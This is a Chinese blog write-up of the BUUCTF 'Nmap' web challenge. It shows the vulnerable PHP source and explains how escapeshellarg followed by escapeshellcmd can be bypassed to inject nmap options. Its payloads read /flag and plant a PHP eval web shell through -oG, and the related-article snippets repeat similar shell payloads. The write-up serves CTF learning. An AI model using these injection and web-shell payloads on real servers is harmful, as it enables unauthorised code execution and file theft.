BUUCTF WEB NMAP

最新推荐文章于 2023-06-24 11:12:08 发布
最新推荐文章于 2023-06-24 11:12:08 发布
阅读量360 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/122187158
版权

经典回显关了的NMAP,和之前做过的一台hack the box靶机里面的某一台比较像
那么就是合理利用 -oN的问题了,直接输出flag就可以,但是你一定要连shell也无所谓,多一步连接工作罢了
127.0.0.1 正常回显,-iL代表查找目标主机中的相关文件
下面就是尝试它如何过滤的
直接输出到flag payload:127.0.0.1' -iL /flag -oN flag '
怎么说呢,我们在127.0.0.1 | ls的时候他把我们的|转义了,那么肯定是有过滤机制的
其中这两个单引号是用来绕过后端过滤机制的,也是为了去构造命令执行的。连shell确定后,后端用了经典的escapeshellarg和escapeshellcmd双过滤机制
在不确定的时候只能盲猜,这也就是套路了,看看后端具体代码

set_time_limit(0);
if (isset($_POST['host'])):
	if (!defined('WEB_SCANS')) {
        	die('Web scans disabled');
	}

	$host = $_POST['host'];
	if(stripos($host,'php')!==false){
		die("Hacker...");
	}
	$host = escapeshellarg($host);
	$host = escapeshellcmd($host);

	$filename = substr(md5(time() . rand(1, 10)), 0, 5);
	$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
	$result_scan = shell_exec($command);
	if (is_null($result_scan)) {
		die('Something went wrong');
	} else {
		header('Location: result.php?f=' . $filename);
	}

nmap_args和result_path在settings.php里不是很重要,我们要关注的还是这一句

$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;

可以看到我们可控的只有$host,假设我们传入的是127.0.0.1’ -iL /flag -oN flag ’
经过escapeshellarg处理,

'127.0.0.1'\'' -iL /flag -oN flag '\'''

经过escapeshellcmd处理

'127.0.0.1'\\'' -iL /flag -oN flag '\\'''

具体看这个:http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/
我们的payload被处理之后被拼接成了

nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/9b661 -iL /flag -oN flag 127.0.0.1\ \\

直接访问/flag就好了,当然这题是纯靠运气成分的,或者说是做题经验?
传shell的payload:127.0.0.1' <?= @eval($_POST["hack2"]);?> -oG hack2.phtml '
参考视频链接:https://www.bilibili.com/video/BV1C44y177th/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebMap:WebMap-Nmap Web 仪表板和报告
05-30
Nmap XML 报告的 Web 仪表板 目录 截屏 用法 您应该将它与 docker 一起使用,只需发送以下命令: $ mkdir /tmp/webmap $ docker run -d \ --name webmap \ -h webmap \ -p 8000:8000 \ -v /tmp/webmap:/opt/...
Web应用安全Nmap扫描原理与用法.docx
06-18
Web安全 Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下...
web buuctf [网鼎杯 2020 朱雀组]Nmap1
weixin_44214568的博客
04-05 1694
考点:namp注入 参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客 1. 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 我们直接用那道buu里的payload: ' <?php eval($_POST["cmd"]);?> -oG zhuque.php ' 注入之后发现存在过滤,fuzz,过滤了php (1)利用<?=来代替.
buuctf-Nmap
m0_62094846的博客
04-07 2745
输入127.0.0.1出现界面,再根据题目的nmap知道是命令执行 输入127.0.0.1 | ls |被转义了,查一下可以用什么代替 分号也被转义了 %0a没被转义,但是也没用(我之前也觉得没有用,就是尝试一下) 那就很难用命令执行了 看看能不能输入一句话木马 127.0.0.1 | ' <?php @eval($_POST['value']);?> -oG hack.php ' 筛查后发现是php被过滤了,修改一下 127.0.0....
BUUCTF: [网鼎杯 2020 朱雀组]Nmap
末初的CSDN博客
09-21 1981
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
BUUCTF [网鼎杯 2020 朱雀组] Nmap
Senimo
12-09 3554
BUUCTF [网鼎杯 2020 朱雀组] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
buuctf刷题8 (ssti注入&nmap- oG指令&别样的sql注入)
weixin_63231007的博客
10-15 916
get_flashed_message()是通过flash()传入闪现信息列表的,能够把字符串对象表示的信息加入到一个消息列表,然后通过调用get_flashed_message()来取出。5.__get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会触发Modifier类中的__invoke()魔术方法。继续看一下getSign函数。这样的语法构造还包括:echo,print,unset(),isset(),empty(),include,require,...
关于buu上的namp两道题
m0_55185160的博客
03-28 1933
关于buu上的namp两道题 这个是题目的源码 源码中只要用到了escapeshellarg()函数和escapeshellcmd()函数,经过搜索这两个函数我们来了解这两个函数: 看这些概念没看太懂,那么我们来实际测试一下,更容易理解些 经过 escapeshellarg 函数处理过的参数被拼凑成 shell 命令,并且被双引号包裹这样就会造成漏洞,这主要在于bash中双引号和单引号解析变量是有区别的。 在解析单引号的时候 , 被单引号包裹的内容中如果有变量 , 这.
Web应用安全Nmap全连接扫描.pptx
06-18
**TCP连接的三次握手** 在理解Nmap全连接扫描之前,我们需要先了解TCP连接...通过理解TCP的三次握手和Nmap的全连接扫描,我们可以更有效地进行Web应用安全检查,发现潜在的漏洞和风险,从而采取措施加强网络安全防护。
Web应用安全Nmap参数介绍.pptx
06-19
**Nmap**,全称**Network Mapper**,是一款强大的网络发现和安全审计工具,由Fyodor于1997年创建,目前已成为网络安全领域最受欢迎的开源工具之一。Nmap的主要功能包括网络主机的列举、服务升级管理、主机和服务状态...
Web应用安全Nmap半连接扫描.pptx
06-18
**Nmap半连接扫描**是网络安全领域中一种重要的探测技术,尤其在Web应用安全中扮演着关键角色。这种扫描方式能够快速识别目标系统的开放端口,从而帮助安全专家定位潜在的攻击点。本文将深入探讨Nmap半连接扫描的...
BUUCTF Web [网鼎杯 2020 朱雀组]Nmap1
网安小趴菜
11-16 666
BUUCTF Web [网鼎杯 2020 朱雀组]Nmap wp1
BUUCTF(web刷题记录一)
nareku的博客
04-16 8690
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
ctf工具Nmap使用教程图文教程(超详细)
程序员小麦的博客
06-24 653
kali的命令行中可以直接使用 nmap 命令,打开一个「终端」,输入 nmap 后回车,可以看到 nmap 的版本,证明 nmap 可用。
2020/7/08 - [BUUCTF 2018]Online Tool - nmap\escapeshellarg与escapeshellcmd连用
抒情诗
07-09 454
文章目录1.首先看下给的源码2.利用nmap的-oG选项写webshell 这里涉及到了nmap的知识,我还没怎么用过nmap这个工具,都说这是个大神器,确实各种option看得我眼花缭乱趁暑假多学一点吧 1.首先看下给的源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['h
BUUCTF__web题解合集(七)
风过江南乱的博客
08-17 921
1、[网鼎杯 2020 朱雀组]Nmap 2、 [网鼎杯 2020 朱雀组]phpweb 3、[BSidesCF 2020]Had a bad day 4、[BJDCTF2020]EasySearch 5、[WUSTCTF2020]朴实无华
[BUUCTF 2018]Online Tool
沐目的博客
10-31 6172
我到底到什么时候,才能学会,看知识点写题,而不是看题解写题。 原因: 基础太差,无法把漏洞知识与实际相结合。 “漏洞知道了,可这和这道题有什么关系?”就是我目前的状态。 如果我知道 namp -PS 127.0.0.1 namp -PS ‘’ 127.0.0.1 nmap -PS ’ " " ’ 127.0.0.1 " " 引号闭合后,加上这些,无影响 如果我知道 namp <?php...
CTF实践 靶机渗透
Radiency的博客
11-23 1464
CTF实践。通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
CTF-命令执行【超详细】
不知名白帽的博客
09-04 9649
CTF-命令执行【超详细】
buuctf nmap
最新发布
10-12
buuctf是北京邮电大学举办的一场CTF比赛,而nmap是一款常用的网络扫描工具。在CTF比赛中,nmap通常用于扫描主机和端口,以了解目标系统的漏洞和服务。使用nmap可以执行各种扫描类型,如TCP SYN扫描、UDP扫描、操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值